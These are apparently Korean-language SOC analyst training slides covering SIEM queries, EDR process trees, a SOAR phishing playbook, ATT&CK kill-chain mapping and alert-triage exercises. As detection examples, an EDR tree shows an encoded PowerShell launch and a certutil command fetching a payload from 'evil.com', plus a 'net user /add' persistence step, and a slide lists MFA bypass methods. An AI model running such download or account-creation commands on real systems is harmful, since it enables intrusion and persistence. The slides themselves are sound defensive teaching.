  • 오탐/정탐 두 경우를 모두 떠올리기
  • Playbook 관련 사용 사례를 한 가지 말로 정리하기
현대 SOC는 연결성으로 작동한다
단일 툴보다 중요한 것은 데이터 → 분석 → 대응이 하나의 운영 체인으로 이어지는가
Part 4

Data Sources

SIEM Detection

Analyst Triage

EDR/Net
Deep Dive

SOAR/IR
Action

Case Closure
  Case Closure → Rule Tuning / Lessons Learned → 다시 Detection으로 환류
이 연결성이 강할수록 MTTDMTTR을 줄이기 쉬워진다
보강 설명실제 SOC에서 한 Alert를 처리하는 과정을 생각해 보면, SIEM이 이상 징후를 잡고, 분석가는 EDR로 호스트를 들여다보며, SOAR가 관련 컨텍스트를 자동으로 수집하거나 조치를…
연결성운영 체인Case
설명 확장
  • 연결성 관점에서 이 주제의 목적을 다시 설명하기
  • 운영 체인 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • 연결성·운영 체인 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
SIEM 활용 예시: 분석가가 실제로 하는 일
검색, 상관분석, 대시보드, 케이스 생성이 핵심 작업
Part 4

검색(Search) 예시

user = "finance01"
AND action = "login_success"
AND src_country != "KR"
AND time > "2026-03-18 00:00"
"finance01 계정의 해외 로그인 성공 이력 조회"

상관분석 룰 예시

IF login_fail_count > 100
  AND time_window < 5min
  AND target = service_account
THEN Alert("Brute-force 의심")
"5분 내 서비스 계정 로그인 100회 이상 실패 시 Alert"

대시보드

실시간 Alert 현황, 국가별 로그인 분포, 이상 행위 Top 10, SLA 준수율 등

케이스 생성

Alert → 조사 메모 → 근거 → 판정 → 조치 이력을 하나의 Case에 기록

SIEM 쿼리 결과 해석 — "이 3줄에서 무엇을 봐야 하나?"
# Splunk SPL — 로그인 실패 다발 탐지
index=auth EventCode=4625 | stats count by user, src_ip, dest
| where count > 10 | sort -count

# 결과 (상위 3행)
user=admin,    src=203.0.113.45, dest=DC01,  03시, count=847
user=svc_backup, src=192.168.1.50, dest=FILE01, 02시, count=203
user=jsmith,   src=8.8.8.8,      dest=MAIL01, 14시, count=12
🚨 1행: admin + 외부 IP + 새벽 3시 + 847회 실패 → 브루트포스 공격 의심 → 즉시 L2 에스컬레이션
⚠️ 2행: 백업 서비스 계정 + 내부 IP + 새벽 + 203회 → 백업 오류 가능성 → IT운영팀 확인 후 판단
✅ 3행: jsmith + Google DNS + 낮 + 12회 → 비밀번호 오입력 가능성 → 당사자 확인 후 Benign
💡 세 줄이 똑같이 "로그인 실패"처럼 보이지만, 컨텍스트(누가·언제·어디서·몇 번)가 모든 판단을 바꿉니다.
EDR 활용 예시: 프로세스 트리 분석
호스트 내부에서 무슨 일이 일어났는지 깊게 볼 수 있다
Part 4
explorer.exe
  └─ outlook.exe
      └─ cmd.exe
          └─ powershell.exe ⚠⚠
              └─ net.exe user /add ⚠⚠⚠
              └─ certutil -urlcache ⚠⚠⚠

왜 수상한가?

  • Outlook에서 cmd → PowerShell 실행은 비정상
  • 계정 생성(net user /add)은 공격 지속성 확보 행위
  • certutil은 파일 다운로드 도구로 악용 가능

EDR이 가능한 조치

  • 해당 프로세스 즉시 종료
  • 호스트 네트워크 격리
  • 관련 파일 격리/삭제
악성 프로세스 트리 읽기 — "이게 왜 위험한가?"
OUTLOOK.EXE  ← 정상 이메일 클라이언트
  └─ cmd.exe  ← ⚠️ 이메일 앱이 왜 cmd를 실행?
     └─ powershell.exe -enc <base64>  ← 🚨 탐지 우회 시도
         └─ certutil.exe -urlcache -f http://evil.com/a.exe
             └─ a.exe  ← 악성 페이로드 실행 완료
🔍 OUTLOOK→cmd: 피싱 이메일 첨부파일 클릭 → 매크로 실행 → cmd 호출. 전형적인 피싱 공격 패턴.
🔍 -enc 플래그: 명령을 Base64로 인코딩해 보안 솔루션 탐지 우회. 정상 업무에서 거의 사용 안 함.
🔍 certutil 다운로드: Windows 기본 도구를 악용한 "Living off the Land" 기법. 악성코드 없이 시작.
✅ EDR이 이 트리를 실시간으로 보여주기 때문에 "피싱→매크로→파워셸 난독화→악성코드 다운로드" 전체 흐름을 한눈에 파악할 수 있습니다.
SOAR 플레이북 예시: 피싱 메일 대응
Alert 발생 → 자동 보강 → 조건 분기 → 조치까지의 자동화 흐름
Part 4
1
🔔 Trigger: "피싱 의심 메일" Alert 발생
2
🔍 자동 Enrichment: 발신자 평판 조회, URL 샌드박스 분석, 첨부파일 해시 확인
3
🔀 조건 분기: 악성 판정이면 → 4번, 불확실하면 → 분석가 승인 요청
4
🛡️ 자동 조치: 해당 메일 전체 사서함에서 삭제, URL 차단, 수신자에게 안내
5
📋 자동 기록: Case 생성, 타임라인 기록, IOC 등록, 리포트 생성
🕐 사람이 하면 30~60분 걸리는 작업을 SOAR는 2~5분에 일관되게 처리 → MTTR 대폭 감소
보강 설명SOAR 플레이북의 실제 예시를 보겠습니다. 피싱 메일 Alert가 발생했을 때 SOAR가 자동으로 수행하는 작업의 흐름입니다.
SOAR플레이북피싱
설명 확장
  • SOAR가 해결하려는 문제를 먼저 정리하기
  • 플레이북 관련 기능과 경계 지점을 구분하기
  • 단독 기능보다 운영 흐름 안에서 바라보기
실무 포인트
  • 입력 데이터·출력 결과·담당 역할을 분리해서 보기
  • 탐지 후 누구에게 어떻게 핸드오프 되는지 확인하기
  • 정책·자동화가 없을 때 생기는 공백을 생각하기
예시 연결
  • 콘솔에서 실제로 어떤 화면과 경보로 보일지 상상하기
  • 오탐/정탐 두 경우를 모두 떠올리기
  • SOAR 관련 사용 사례를 한 가지 말로 정리하기
도구 비교 종합표
경쟁이 아니라 역할 분담 — 각각의 시야와 능력이 다르다
Part 4
구분SIEMEDRIDS/IPSSOAR
관찰 범위전체 인프라호스트 내부네트워크 흐름도구 간 연결
핵심 기능수집·상관분석행위 분석·격리패턴 탐지·차단자동화·오케스트레이션
주요 질문"어디에서도 이런 일이?""이 PC에서 뭘 했나?""네트워크에 이상 있나?""자동으로 처리 가능?"
즉시 대응△ (연동 시)○ (격리/차단)○ (IPS만)○ (플레이북)
약점로그 품질 의존호스트 외 못 봄암호화 트래픽 한계프로세스 없으면 무용
  SIEM은 넓게, EDR은 깊게, IDS/IPS는 네트워크를, SOAR는 빠르게 — 이것만 기억하세요
보강 설명네 가지 핵심 도구를 한 장으로 비교합니다. 각 도구는 경쟁이 아니라 역할 분담 관계라는 점을 기억하세요.
SIEMEDRIDS/IPS
설명 확장
  • SIEM가 해결하려는 문제를 먼저 정리하기
  • EDR 관련 기능과 경계 지점을 구분하기
  • 단독 기능보다 운영 흐름 안에서 바라보기
실무 포인트
  • 입력 데이터·출력 결과·담당 역할을 분리해서 보기
  • 탐지 후 누구에게 어떻게 핸드오프 되는지 확인하기
  • 정책·자동화가 없을 때 생기는 공백을 생각하기
예시 연결
  • 콘솔에서 실제로 어떤 화면과 경보로 보일지 상상하기
  • 오탐/정탐 두 경우를 모두 떠올리기
  • SIEM 관련 사용 사례를 한 가지 말로 정리하기
흔한 오해 바로잡기
보안 도구에 대한 잘못된 생각들
Part 4

오해

"SIEM 하나면 다 보인다"

실제

SIEM은 수집된 로그만 볼 수 있다. 수집 안 된 것은 보이지 않는다.

오해

"SOAR 도입하면 사람이 필요 없다"

실제

프로세스와 판단 기준이 없으면 SOAR는 자동으로 실수를 반복한다.

오해

"로그 많이 수집 = 관제 잘함"

실제

로그 양보다 컨텍스트와 탐지 룰의 품질이 SOC 성능을 결정한다.

현장에서 자주 듣는 추가 오해 3가지
"우리 회사는 작으니까 해커 타겟이 아니에요"
현대 공격자는 자동화 스캐너로 인터넷 전체를 스캔합니다. 서버가 하나뿐이어도 취약점이 있으면 공격받습니다. SMB(중소기업)가 전체 침해사고의 43%를 차지합니다 (Verizon 2024).
"백신(안티바이러스)만 있으면 충분하죠"
현대 공격자는 파일리스(Fileless) 기법으로 파일 없이 메모리에서만 실행합니다. 백신은 파일 기반 악성코드에 최적화돼 이런 공격을 탐지하지 못합니다. EDR·SIEM 같은 행위 기반 탐지가 필요한 이유입니다.
"보안 사고는 무조건 외부 해커 탓이다"
침해 원인의 74%에 내부 인간 실수(오설정, 피싱 클릭, 권한 남용)가 포함됩니다 (Verizon 2024). 직원이 피싱 링크를 클릭하는 것이 가장 흔한 공격 시작점입니다.
Check Point: Part 4 복습
보안 도구에 대해 스스로 답해 보세요
Part 4 · 퀴즈

스스로 답해 보세요

Q1. SIEM과 EDR의 관찰 범위 차이는?
Q2. IDS와 IPS의 핵심 차이는?
Q3. SOAR의 플레이북이란 무엇인가?
Q4. "SIEM은 넓게, EDR은 _____, SOAR는 _____" 빈칸을 채우면?
Q5. SOAR 자동화가 위험해지는 경우는?
보강 설명핵심 개념을 짧게 꺼내보는 점검 구간입니다. 정답 여부보다 설명 순서와 근거가 더 중요합니다.
퀴즈복습
답변 힌트
  • 핵심 정의를 한 문장으로 먼저 답하기
  • 예시는 1개만 붙여 간결하게 설명하기
  • 용어 차이는 목적과 역할로 구분해 말하기
생각 순서
  • 사실 → 맥락 → 판단 순서를 유지하기
  • 오탐 가능성과 추가 확인 항목을 함께 적기
  • 마지막은 다음 조치 제안으로 마무리하기
토론 포인트
  • 다른 역할이라면 같은 질문을 어떻게 볼지
  • 판단을 바꿀 추가 데이터가 무엇인지
  • 실무에서의 영향과 우선순위까지 연결하기
Part 4 요약 — 보안 도구 이해
Part 4 · 요약
✓ SIEM: 전체 인프라 로그 수집·상관분석 — "넓게 본다"
✓ EDR: 호스트 내부 프로세스/파일 행위 — "깊게 본다"
✓ IDS/IPS: 네트워크 패턴 탐지/차단 — "흐름을 감시한다"
✓ SOAR: 반복 업무 자동화, 도구 연결 — "빠르게 움직인다"
✓ 핵심: 도구의 개수보다 연결성이 중요 — 핸드오프 없는 운영 체인이 목표
보강 설명앞선 슬라이드의 핵심을 회수해 기억에 남기는 구간입니다. 용어보다 역할과 흐름을 연결해 보세요.
SIEMEDRIDS/IPS
핵심 회수
  • SIEM·EDR 핵심어를 세 문장으로 압축해 보기
  • 정의보다 역할·가치·흐름을 연결해서 설명하기
  • 비슷한 개념과의 차이를 짧게 대비해 보기
실무 연결
  • 현업에서는 어떤 로그·도구·협업으로 보이는지 떠올리기
  • 판단이 필요한 순간과 비용을 함께 생각하기
  • 오탐과 과소판단이 만드는 리스크를 비교하기
복습 체크
  • 혼자 설명 가능한 핵심 용어 3개 고르기
  • 다음 모듈과 이어질 질문 1개 만들어 보기
  • 실무 문장으로 바꾸어 다시 써 보기
05
공격 시나리오 사례
공격 체인 이해와 타임라인 분석, 분석가 체크리스트
약 40분
공격 체인 ATT&CK 타임라인 피싱 체크리스트
공격은 단일 이벤트가 아니라 체인으로 보인다
피싱 한 통에서 끝나지 않고, 계정 탈취 → 내부 접근 → 수집 → 유출로 이어진다
Part 5

피싱 메일
Initial Access

인증정보 탈취
Credential Access

비정상 로그인
Persistence

내부 탐색
Discovery

데이터 수집
Collection

외부 유출
Exfiltration
MITRE ATT&CK 관점: Tactic은 "왜(Why)", Technique은 "어떻게(How)" — 공격 행위를 구조화하는 프레임워크
각 단계에서 SOC가 "어디서" 이상 신호를 발견하는가
피싱 메일
→ 이메일 게이트웨이에서 악성 URL·첨부 탐지. 직원이 클릭하면 Proxy 로그에 악성 도메인 접속 기록이 남는다.
인증정보 탈취
→ 이후 로그인 로그에서 해당 계정으로 다른 국가·새 디바이스 접속이 나타난다. SIEM의 "동일 계정, 다른 위치" 룰이 발동한다.
내부 탐색
→ EDR에서 powershell, net user, whoami 등 내부 정찰 명령 실행 기록이 보인다. SIEM 상관분석에서 연쇄 실행을 감지한다.
킬체인 단계별 탐지 기회 — "언제 잡을 수 있는가?"
공격 단계 공격자 행위 SOC 탐지 소스 탐지 시 피해 수준
정찰LinkedIn, 이메일 수집외부 활동 — 탐지 어려움없음
초기 침투피싱 → 매크로 → 쉘이메일 게이트웨이 + EDR최소 (단일 호스트)
권한 확보비밀번호 덤프, 관리자 탈취EDR (LSASS 접근 탐지)중간 (내부 확산 시작)
측면 이동내부 서버 순차 침투SIEM 상관분석높음 (다수 시스템)
목적 달성데이터 유출 or 랜섬웨어DLP + 네트워크 이상치명적 — 너무 늦음
💡 공격자는 체인을 끊기지 않게 진행해야 하지만, SOC는 어느 단계에서도 끊을 수 있습니다. 빠를수록 피해가 작습니다.
타임라인으로 보면 공격이 보인다
점 형태의 이벤트를 시간순 맥락으로 재구성하는 것이 SOC 분석의 핵심
Part 5
09:03
피싱 메일 링크 클릭
Email Log
09:08
비정상 인증 시도 증가
Auth Log
09:10
MFA 성공 또는 우회 징후
Auth Log
09:18
신규 디바이스/국가에서 로그인 성공
SSO / Cloud Login
09:25
메일박스 검색 / 규칙 생성 / 파일 조회
SaaS Activity
09:33
대량 다운로드
Cloud Storage / Proxy
09:40
외부 업로드 또는 비정상 공유
DLP / Proxy / CASB
보강 설명이 타임라인에서 중요한 것은 도구별 관찰 지점을 함께 보는 것입니다. 피싱 클릭은 이메일 보안 로그, 로그인 이상은 인증 로그, 대량 다운로드는 클라우드 감사 로그에서 보입니다. 공격자는…
TimelineCorrelationMultiple Telemetry
설명 확장
  • Timeline 관점에서 이 주제의 목적을 다시 설명하기
  • Correlation 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • Timeline·Correlation 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
분석가는 무엇을 먼저 확인해야 하는가
좋은 분석은 많이 보는 것이 아니라, 우선순위가 높은 질문을 빠르게 던지는 것
Part 5

Who

어떤 사용자/계정인가?
VIP/관리자 계정인가?

Where

어떤 IP, 국가, 디바이스인가?

When

정상 업무 시간과 다른가?
직전/직후 어떤 행위?

What

로그인 후 어떤 시스템/데이터에 접근했는가?

Impact

범위와 영향도는 어느 정도인가?

Action

계정 잠금, 세션 종료, 격리 등 즉시 조치가 필요한가?

추가 확인: 승인된 변경 작업 여부 · 출장/재택/VPN 예외 · 동일 행위 다른 계정 확산 · IOC 평판 / 기존 유사 케이스
시간 압박 상황에서 "무엇을 먼저 볼 것인가" 판단 팁
즉시 확인 (30초 이내)
① 어떤 계정? (일반/관리자/VIP)
② 어떤 자산? (일반 PC/서버/DC/클라우드 IAM)
→ 이 두 가지만으로 우선순위 80%가 결정된다
다음 확인 (2분 이내)
③ 로그인 후 어떤 행동을 했는가? (단순 조회 vs 대량 다운로드)
④ 출장/승인 기록이 있는가?
→ 이 두 가지로 "정상 가능성"을 검증한다
MITRE ATT&CK 프레임워크란
Tactic은 "왜(Why)", Technique은 "어떻게(How)" — 공격 행위를 구조화하는 공통 언어
Part 5

Tactic = 왜 (목적)

공격자가 이루고자 하는 목표
예: Initial Access, Persistence, Exfiltration

Technique = 어떻게 (방법)

그 목표를 달성하기 위한 구체적 수단
예: Phishing, PowerShell, Web Shell

Tactic (전술)설명Technique 예시
Initial Access최초 침투Phishing, 취약점 악용
Credential Access자격증명 획득Brute Force, Credential Dumping
Persistence지속적 접근 확보계정 생성, 스케줄 작업
Collection정보 수집파일 검색, 이메일 수집
Exfiltration외부 유출클라우드 업로드, HTTP 전송
실무에서 ATT&CK을 어떻게 쓰는가?
공통 언어: "이상한 PowerShell 실행"이 아니라 "T1059.001 감지"로 쓰면, 전 세계 어떤 보안 팀과도 동일한 공격 기법을 논의할 수 있다.
탐지 공백 발견: "우리 SOC는 Initial Access·Exfiltration은 탐지되지만, Lateral Movement 룰이 없다" → 개선 우선순위를 지도처럼 파악 가능.
ATT&CK를 쓰면 대화가 어떻게 달라지나
❌ ATT&CK 없을 때
L2: "공격자가 이상한 파워셸 쓰는 것 같아요"
L3: "어떤 파워셸이요?"
L2: "Base64로 인코딩된... 뭔가 다운로드..."
→ 설명에 10분 소요
✅ ATT&CK 사용 시
L2: "T1059.001 + T1027 난독화 + T1105 조합 같아요"
L3: "Dropper 패턴이네요. T1566 피싱이랑 연결되는지 확인해요"
30초 만에 맥락 공유 완료
📌 T1059.001 = PowerShell 실행  |  T1027 = 난독화/인코딩 탐지 우회  |  T1105 = 원격 파일 전송
💡 ATT&CK ID는 기술 사전의 "페이지 번호"입니다. 전 세계 어느 SOC에서도 T1059.001이라 말하면 동일한 기법을 의미합니다.
공격 단계별 탐지 포인트
각 단계마다 볼 수 있는 데이터 소스와 도구가 다르다
Part 5
공격 단계주요 흔적관찰 도구/소스탐지 가능 신호
① 피싱 메일 수신·클릭 Email Gateway 악성 URL 클릭, 첨부 실행
② 인증정보 탈취 로그인 시도 급증 SIEM / Auth Log 로그인 실패 폭증, MFA 우회
③ 비정상 접속 해외 IP, 신규 디바이스 SIEM / IdP Impossible Travel, 새 세션
④ 내부 탐색 PowerShell, 파일 검색 EDR 비정상 프로세스 트리
⑤ 수집·유출 대량 다운로드, 외부 전송 DLP / Proxy / CASB 비정상 데이터 이동
공격자는 하나이지만 흔적은 여러 시스템에 흩어진다 → 이것이 SIEM이 상관분석을 하는 이유
보강 설명각 공격 단계에서 SOC가 탐지할 수 있는 포인트가 다릅니다. 피싱은 이메일 보안에서, 자격증명 탈취는 인증 로그에서, 내부 탐색은 EDR과 네트워크에서 보입니다. 이것이 SOC가 여러 데이터…
탐지 포인트데이터 소스공격 단계
설명 확장
  • 탐지 포인트 관점에서 이 주제의 목적을 다시 설명하기
  • 데이터 소스 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • 탐지 포인트·데이터 소스 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
참고: Impossible Travel 탐지
물리적으로 불가능한 위치 이동은 강력한 이상 신호
Part 5
📍 로그인 이력
14:20 finance01 로그인 성공
     위치: Seoul, KR
     IP: 211.x.x.x

14:52 finance01 로그인 성공
     위치: Singapore, SG
     IP: 203.x.x.x

⚠ 시간 차: 32분
⚠ 거리: ~4,600km
서울 → 싱가포르 최소 비행시간: 6시간
32분 내 이동은 물리적으로 불가능

가능한 해석

  • 계정 탈취: 다른 사람이 사용 중
  • VPN/프록시: 출구 IP가 해외 (확인 필요)
  • 세션 토큰 탈취: 공격자가 별도 세션 사용
흔한 오해: "Impossible Travel = 무조건 공격"
❌ 잘못된 판단
VPN 서비스를 쓰면 서울에서 접속해도 IP는 해외로 나온다. 또는 출장 전날 국내에서 로그인하고 비행기 안에서 재접속하면 "서울→싱가포르 20분"처럼 보일 수 있다. → 자동 차단하면 정상 사용자를 막는다.
✅ 올바른 접근
① 해당 IP가 알려진 VPN/Proxy인가? ② 사용자 VPN 사용 승인 여부? ③ 직후 행위가 정상인가? — 세 가지를 확인 후 판단. Impossible Travel은 "조사 시작점"이지 "결론"이 아니다.
참고: IOC(Indicator of Compromise)란
침해가 발생했음을 나타내는 흔적 — 위협 인텔리전스의 기본 단위
Part 5

IOC 유형

  • IP 주소: 알려진 악성 C2 서버 IP
  • 도메인: 피싱 사이트, 악성 도메인
  • 파일 해시: 악성코드 파일의 MD5/SHA256
  • 이메일: 피싱 발신자 주소
  • URL: 악성 링크 경로

SOC에서의 활용

  • Alert에 포함된 IP/도메인을 평판 DB와 조회
  • SIEM에서 IOC 기반 검색 및 상관분석
  • SOAR에서 자동 Enrichment로 활용
  • 위협 인텔리전스 피드 자동 업데이트
IOC 조회 시 참고 서비스: VirusTotal, AbuseIPDB, URLScan.io, Shodan 등
IOC 조회 실무 예시
IP 조회: Alert에 포함된 203.0.113.42를 AbuseIPDB에 검색
→ "Confidence: 87%, 지난 30일간 1,200건 신고 — C2 서버로 알려짐"
→ Severity 즉시 상향, IR 에스컬레이션
파일 해시 조회: 수상한 파일의 SHA256을 VirusTotal에 검색
→ "72/73개 보안 엔진이 악성으로 탐지 — Emotet 변종"
→ 해당 호스트 즉시 격리 + 같은 해시를 받은 다른 호스트 SIEM 검색
분석가 워크스루: Alert에서 Incident까지
실제 분석가의 사고 흐름을 따라가기
Part 5
Step 1
Alert 수신: "해외 IP 로그인 성공" → finance01 계정
Step 2
사용자 확인: finance01은 재무부 → 민감 계정 → 우선순위 ↑
Step 3
컨텍스트 확인: 출장 등록 없음, VPN 예외 없음 → 정상 가능성 ↓
Step 4
후속 행위 검색: SIEM에서 로그인 후 12분 내 85개 문서 다운로드 확인 → 위험 ↑↑
Step 5
판단: 해외 IP + 신규 디바이스 + 재무 계정 + 대량 다운로드 + 예외 없음 → HIGH
Step 6
조치: 사용자 확인 요청 + 세션 종료 + L2/IR 에스컬레이션 + 다운로드 범위 조사
보강 설명실제 분석가가 이 시나리오를 어떻게 조사하는지 워크스루를 해보겠습니다. 첫 Alert 수신부터 최종 판단까지의 사고 흐름을 따라갑니다.
워크스루분석 흐름사고 과정
설명 확장
  • 워크스루 관점에서 이 주제의 목적을 다시 설명하기
  • 분석 흐름 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • 워크스루·분석 흐름 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
실제 위협 트렌드 — 최근 보고서 기반
SOC가 어떤 공격 유형에 탐지 역량을 집중해야 하는가
Part 5
📧
#1
피싱 / 소셜 엔지니어링
최초 침투의 가장 흔한 경로
🔑
#2
자격증명 남용/탈취
탈취된 계정으로 정상처럼 행동
🪲
#3
취약점 악용
패치되지 않은 시스템 대상 공격
SOC의 탐지 룰은 이러한 실제 위협 트렌드에 맞춰 우선순위를 정해야 한다
참고: Verizon 2025 DBIR, ENISA Threat Landscape
보강 설명Verizon 2025 DBIR에 따르면, 가장 흔한 침해 유입 경로는 여전히 피싱과 자격증명 남용입니다. 취약점 악용도 증가 추세입니다. 이 데이터는 SOC가 어떤 공격 유형에 탐지 역량을…
DBIR피싱자격증명
설명 확장
  • DBIR 관점에서 이 주제의 목적을 다시 설명하기
  • 피싱 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • DBIR·피싱 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
Check Point: Part 5 복습
공격 시나리오에 대해 스스로 답해 보세요
Part 5 · 퀴즈

스스로 답해 보세요

Q1. 공격을 "체인"으로 보는 것이 왜 중요한가?
Q2. MITRE ATT&CK에서 Tactic과 Technique의 차이는?
Q3. 피싱 메일 클릭 흔적은 어떤 로그에서 보이는가?
Q4. "로그인 자체"보다 더 중요한 것은 무엇이라고 했는가?
Q5. 최근 침해 사고에서 가장 흔한 최초 침투 경로는?
보강 설명핵심 개념을 짧게 꺼내보는 점검 구간입니다. 정답 여부보다 설명 순서와 근거가 더 중요합니다.
퀴즈복습
답변 힌트
  • 핵심 정의를 한 문장으로 먼저 답하기
  • 예시는 1개만 붙여 간결하게 설명하기
  • 용어 차이는 목적과 역할로 구분해 말하기
생각 순서
  • 사실 → 맥락 → 판단 순서를 유지하기
  • 오탐 가능성과 추가 확인 항목을 함께 적기
  • 마지막은 다음 조치 제안으로 마무리하기
토론 포인트
  • 다른 역할이라면 같은 질문을 어떻게 볼지
  • 판단을 바꿀 추가 데이터가 무엇인지
  • 실무에서의 영향과 우선순위까지 연결하기
Part 5 요약 — 공격 시나리오 사례
Part 5 · 요약
✓ 공격은 체인: 피싱 → 자격증명 탈취 → 내부 접근 → 수집 → 유출
✓ MITRE ATT&CK: Tactic(왜) + Technique(어떻게)으로 구조화
✓ 분석은 타임라인: 점 형태의 이벤트를 시간순으로 재구성
✓ 탐지 포인트: 각 공격 단계마다 관찰 가능한 소스와 도구가 다르다
✓ 핵심 질문: "로그인 자체"보다 "로그인 후 무엇을 했는가"가 더 중요하다
이 통계가 SOC에 주는 메시지
#1 피싱: 이메일 게이트웨이 탐지 + 직원 보안 교육이 중요. SOC에서는 이메일 로그와 Proxy 로그를 연결해 "악성 링크 클릭 후 다운로드 행위"를 탐지한다.
#2 자격증명 남용: MFA 도입이 필수이지만 MFA 우회 공격도 증가 중. SOC에서는 "동일 계정 여러 위치 동시 접속", "Impossible Travel" 룰로 탐지한다.
#3 취약점 악용: 패치 미적용 시스템이 있으면 IPS/IDS가 첫 번째 방어선. SOC에서는 취약한 서버로의 비정상 네트워크 접근을 탐지한다.
06
Alert 판단 실습
3개 케이스 실습 — 정답보다 근거를 작성하라
약 30분
케이스 분석 판단문 작성 Fact + Reason 에스컬레이션 근거 기반
실습 목표: "정답"보다 "근거"를 작성하라
중요한 것은 맞히는 것이 아니라, 왜 그렇게 판단했는지를 문장으로 남기는 것
Part 6 · 실습

각 케이스마다 작성할 5가지

  • Fact — 관측 사실
  • Why suspicious — 왜 의심스러운가
  • What to check — 추가 확인 필요 사항
  • Verdict — 최종 판단
  • Next action — 권고 조치

판단 등급 예시

✅ 정상 또는 오탐
👁️ 모니터링 필요
⬆️ 의심 / L2 에스컬레이션
🚨 Incident 가능성 높음 / 즉시 대응
  권장 진행: 개인 판단 2분 → 짝 토론 3분 → 전체 피드백
보강 설명각 Alert는 의도적으로 약간의 애매함이 있도록 구성되어 있습니다. 실무에서도 모든 사건이 명확하지 않기 때문에, 중요한 것은 모르는 상태에서 무엇을 확인할지 구조적으로 정리하는 능력입니다…
FactCheckVerdict
판단 포인트
  • Fact·Check 같은 맥락 단서를 먼저 해석하기
  • 숫자만 보지 말고 계정·자산·시간대를 함께 보기
  • 정상 운영 변경 가능성을 항상 열어두기
추가 확인
  • Verdict 여부를 직전 변경 이력과 함께 교차 확인하기
  • 동일 시간대의 인증·호스트·네트워크 로그 묶어 보기
  • 단서 사이에 모순이 있는지 끝까지 점검하기
권고 흐름
  • 초기 분류와 보류 사유를 함께 기록하기
  • 필요 시 L2·IR 에스컬레이션 기준을 명시하기
  • 조치 후 재발 방지 포인트까지 남기기
실습 전 핵심 복습: 판단 프레임워크
이 구조를 머릿속에 두고 각 케이스를 분석하세요
Part 6 · 복습
📋
Fact
무엇이 언제
어디서 발생?
🤔
Reason
왜 의심?
🔍
Check
추가 확인?
⚖️
Verdict
최종 판단
Action
권고 조치
  모르는 것이 있어도 괜찮습니다. 중요한 것은 "무엇을 모르는지"를 구조적으로 정리하는 것입니다.
보강 설명앞선 슬라이드의 핵심을 회수해 기억에 남기는 구간입니다. 용어보다 역할과 흐름을 연결해 보세요.
프레임워크복습실습
핵심 회수
  • 프레임워크·복습 핵심어를 세 문장으로 압축해 보기
  • 정의보다 역할·가치·흐름을 연결해서 설명하기
  • 비슷한 개념과의 차이를 짧게 대비해 보기
실무 연결
  • 현업에서는 어떤 로그·도구·협업으로 보이는지 떠올리기
  • 판단이 필요한 순간과 비용을 함께 생각하기
  • 오탐과 과소판단이 만드는 리스크를 비교하기
복습 체크
  • 혼자 설명 가능한 핵심 용어 3개 고르기
  • 다음 모듈과 이어질 질문 1개 만들어 보기
  • 실무 문장으로 바꾸어 다시 써 보기
참고: MFA도 우회될 수 있다
MFA 성공이 곧 "안전"을 의미하지 않는 이유
Part 6 · 참고

MFA 우회 방법들

  • MFA Fatigue: 승인 알림 반복 전송 → 실수로 승인 유도
  • 세션 토큰 탈취: 로그인 후 세션 토큰을 훔쳐 MFA 없이 접근
  • 실시간 피싱 릴레이: MFA 코드를 실시간 중계
  • SIM 스와핑: 전화번호 기반 MFA 우회
"MFA 성공 = 본인이 한 것"이라고 단정하면 안 된다

분석 시 확인할 것

  • MFA 승인 시점과 로그인 시점의 간격
  • 동일 시간대 다른 위치 활동
  • 로그인 후 행위의 이상 여부
  • 사용자 본인 확인
보강 설명실습 Case B에서 MFA가 나옵니다. MFA가 있어도 공격자가 우회할 수 있는 방법들을 미리 알아두면 분석에 도움이 됩니다.
MFA피로 공격세션 탈취
판단 포인트
  • MFA·피로 공격 같은 맥락 단서를 먼저 해석하기
  • 숫자만 보지 말고 계정·자산·시간대를 함께 보기
  • 정상 운영 변경 가능성을 항상 열어두기
추가 확인
  • 세션 탈취 여부를 직전 변경 이력과 함께 교차 확인하기
  • 동일 시간대의 인증·호스트·네트워크 로그 묶어 보기
  • 단서 사이에 모순이 있는지 끝까지 점검하기
권고 흐름
  • 초기 분류와 보류 사유를 함께 기록하기
  • 필요 시 L2·IR 에스컬레이션 기준을 명시하기
  • 조치 후 재발 방지 포인트까지 남기기
참고: 서비스 계정이란?
사람이 아니라 시스템이 사용하는 계정 — 분석 관점이 다르다
Part 6 · 참고

사용자 계정

  • 사람이 직접 로그인
  • 업무 시간에 주로 활동
  • MFA 적용 가능
  • 로그인 패턴이 다양

서비스 계정 (svc_*)

  • 시스템/앱이 자동 인증에 사용
  • 24시간 규칙적으로 활동
  • MFA 적용 어려운 경우 많음
  • 비밀번호 변경 시 설정 동기화 필요
